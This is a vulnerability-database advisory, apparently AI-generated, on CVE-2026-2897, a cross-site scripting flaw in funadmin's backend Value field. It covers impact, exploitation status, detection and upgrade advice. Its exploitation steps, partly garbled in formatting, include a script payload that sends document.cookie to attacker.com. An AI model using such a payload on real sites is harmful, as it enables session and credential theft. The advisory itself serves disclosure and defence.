
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2897 is a stored/reflected cross-site scripting (XSS) vulnerability in funadmin up to version 7.1.0-rc4. The flaw exists in the Backend Interface component, specifically in the file app/backend/view/index/index.html, where manipulation of the Value argument leads to improper neutralization of user-supplied input during web page generation. It affects all funadmin versions prior to 7.1.0, including release candidates rc1 through rc4. The vulnerability was published on February 22, 2026, and carries a CVSS v3.1 base score of 4.8 (Medium) (Red Hat CVE, Feedly). The vendor was contacted prior to disclosure but did not respond.
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) with a secondary classification of CWE-94 (Improper Control of Generation of Code). An attacker with high privileges (e.g., an authenticated backend administrator) can manipulate the Value argument in the Backend Interface to inject malicious scripts that are rendered in the victim's browser. Exploitation requires user interaction — a victim must visit or interact with the crafted page — and the attack originates remotely over the network. A public proof-of-concept has been disclosed via GitHub (GitHub PoC).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session, potentially leading to session token theft, credential harvesting, content defacement, or unauthorized actions performed on behalf of the victim. The confidentiality and integrity impacts are rated low, with no direct availability impact. Because the vulnerability resides in the backend administrative interface, exploitation could facilitate privilege escalation or lateral movement if administrator session cookies are captured (Red Hat CVE, Feedly).
A public proof-of-concept exploit has been disclosed on GitHub as of February 24, 2026, though there is no current evidence of active in-the-wild exploitation (GitHub PoC). The EPSS score is approximately 0.03%, indicating a low probability of exploitation in the near term. The CVSSv4 exploit maturity is rated "Proof of Concept." No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
app/backend/view/index/index.html and identify the Value input field.Value argument, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>, which is stored or reflected without proper sanitization.<script> tags in the Value parameter.app/backend/view/index/index.html with anomalous or encoded content in the Value field; error logs indicating unexpected script execution or content rendering issues.app/backend/view/index/index.html or related template files if the XSS payload is stored server-side.Upgrade funadmin to version 7.1.0 (stable release) or later, as all versions up to and including 7.1.0-rc4 are affected. Since the vendor has not responded to disclosure, no official patch advisory has been issued; upgrading to the stable 7.1.0 release is the primary recommended remediation (Red Hat CVE). As interim mitigations: implement strict input validation and output encoding for the Value argument in the Backend Interface; restrict backend access to trusted IP ranges using firewall rules or VPN; and deploy a Web Application Firewall (WAF) with XSS detection rules to block malicious payloads.
The vulnerability has been indexed by several security aggregators including VulDB, Vulners, CIRCL, and INCIBE-CERT, indicating routine community tracking. No notable researcher commentary or significant media coverage has been identified beyond standard CVE database entries. The vendor's lack of response to the initial disclosure has been noted in the public record (GitHub PoC).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."